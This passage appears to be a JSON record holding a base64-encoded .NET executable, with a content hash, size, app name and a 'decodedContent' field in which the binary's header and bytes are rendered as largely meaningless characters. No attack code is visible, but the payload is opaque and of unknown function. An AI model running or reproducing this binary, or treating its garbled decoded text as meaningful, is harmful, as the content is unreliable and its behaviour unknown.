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", - "contentHash": { - "sha256": "2d12874ce5eff797003e69815c70c9dce5876e4062e3162c3bad65d20831d5cb" - }, - "originalSize": "612864", - "appName": "DotNet", - "decodedContent": "\u5a4d\u0090\u0003\u0000\u0004\u0000\uffff\u0000\u00b8\u0000\u0000\u0000@\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0080\u0000\u1f0e\u0eba\ub400\ucd09\ub821\u4c01\u21cd\u6854\u7369\u7020\u6f72\u7267\u6d61\u6320\u6e61\u6f6e\u2074\u6562\u7220\u6e75\u6920\u206e\u4f44\u2053\u6f6d\u6564\u0d2e\u0a0d$\u0000\u0000\u0000\u4550\u0000\u014c\u0003\ueb01\u5a95\u0000\u0000\u0000\u0000\u00e0\u2102\u010b\u000b\u5200\t\u0600\u0000\u0000\u0000\u70ae\t\u2000\u0000\u8000\t\u0000\u1000\u2000\u0000\u0200\u0000\u0004\u0000\u0000\u0000\u0006\u0000\u0000\u0000\uc000\t\u0200\u0000\u9006\t\u0003\u8560\u0000\u0010\u1000\u0000\u0000\u0010\u1000\u0000\u0000\u0000\u0010\u0000\u0000\u0000\u0000\u0000\u7058\tS\u0000\u8000\t\u03f0\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\ua000\t\f\u0000\u6f20\t\u001c\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u2000\u0000\b\u0000\u0000\u0000\u0000\u0000\u2008\u0000H\u0000\u0000\u0000\u0000\u0000\u742e\u7865t\u0000\u50b4\t\u2000\u0000\u5200\t\u0200\u0000\u0000\u0000\u0000\u0000\u0000\u0000 \u6000\u722e\u7273c\u0000\u03f0\u0000\u8000\t\u0400\u0000\u5400\t\u0000\u0000\u0000\u0000\u0000\u0000@\u4000\u722e\u6c65\u636f\u0000\f\u0000\ua000\t\u0200\u0000\u5800\t\u0000\u0000\u0000\u0000\u0000\u0000@\u4200\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u7090\t\u0000\u0000H\u0000\u0002\u0005\uc3ac\u0003\uab74\u0005\t\u0000\u0000\u0000\ub900\u0002\u0aaa\u0001\u2050\u0000\u0080\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\ue6a3\u8233\ufffd\uffc6\ubf62\u5231\u2bf1\uc246\u28c3\ua650\ue501\uc6a7\uf8fd\uba71\u78c1\u6a88\u1eba\u07ac\u1acf\u9528\uc041\u1735\u105b\ube12\u6429\ucc1c\ubb66\u725d\ue31e\u0462\ub239\uc676\ubeee\u4969\ucdb5\u5b42\u25a9\uc392\u5d50\u99c8\ue5c4\uba43\u02db\u6210\u8997\uc1db\u05e3\u0107\u113d\u05fc\u6fc3\ub335\uf0be\u171e\ub204\u565f\u4bb8\u1e51\u3276\u32f2\ud6c2\ufffd\u7254\u2e32\u021e\u2428\u0000\u2a0a\u021e\u2428\u0000\u2a0a\u023a\u2428\u0000\u020a\u2803\u0005\u0600\u1e2a\u7b02\u0001\u0400\u222a\u0302\u017d\u0000\u2a04\u021e\u2428\u0000\u2a0a\u021e\u2428\u0000\u2a0a\u023a\u2428\u0000\u020a\u2803\n\u0600\u1e2a\u7b02\u0002\u0400\u222a\u0302\u027d\u0000\u2a04\u0226\u1603\u0c28\u0000\u2a06\u0256\u2428\u0000\u020a\u2803\u000e\u0600\u0402\u1028\u0000\u2a06\u021e\u037b\u0000\u2a04\u0222\u7d03\u0003\u0400\u1e2a\u7b02\u0004\u0400\u222a\u0302\u047d\u0000\u2a04\u0222\u2817\u0012\u0600\u3a2a\u2802$\u0a00\u0302\u1428\u0000\u2a06\u021e\u057b\u0000\u2a04\u0222\u7d03\u0005\u0400\u1e2a\u2802$\u0a00\u3a2a\u2802$\u0a00\u0302\u1828\u0000\u2a06\u021e\u067b\u0000\u2a04\u0222\u7d03\u0006\u0400\u262a\u1d02\u2817\u001c\u0600\u262a\u0302\u2817\u001c\u0600\u262a\u1d02\u2803\u001c\u0600\u562a\u2802$\u0a00\u0302\u1e28\u0000\u0206\u2804 \u0600\u1e2a\u7b02\u0007\u0400\u222a\u0302\u077d\u0000\u2a04\u021e\u087b\u0000\u2a04\u0222\u7d03\b\u0400\u262a\u1d02\u2817$\u0600\u262a\u0302\u2817$\u0600\u262a\u1d02\u2803$\u0600\u562a\u2802$\u0a00\u0302\u2628\u0000\u0206\u2804(\u0600\u1e2a\u7b02\t\u0400\u222a\u0302\u097d\u0000\u2a04\u021e\u0a7b\u0000\u2a04\u0222\u7d03\n\u0400\u1e2a\u2802$\u0a00\u3a2a\u2802$\u0a00\u0302\u2c28\u0000\u2a06\u021e\u167b\u0000\u2a04\u0222\u7d03\u0016\u0400\u1e2a\u2802$\u0a00\u1e2a\u2802$\u0a00\u1e2a\u2802$\u0a00\u3a2a\u2802$\u0a00\u0302\u3228\u0000\u2a06\u021e\u177b\u0000\u2a04\u0222\u7d03\u0017\u0400\u1e2a\u2802$\u0a00\u3a2a\u2802$\u0a00\u0302\u3628\u0000\u2a06\u021e\u187b\u0000\u2a04\u0222\u7d03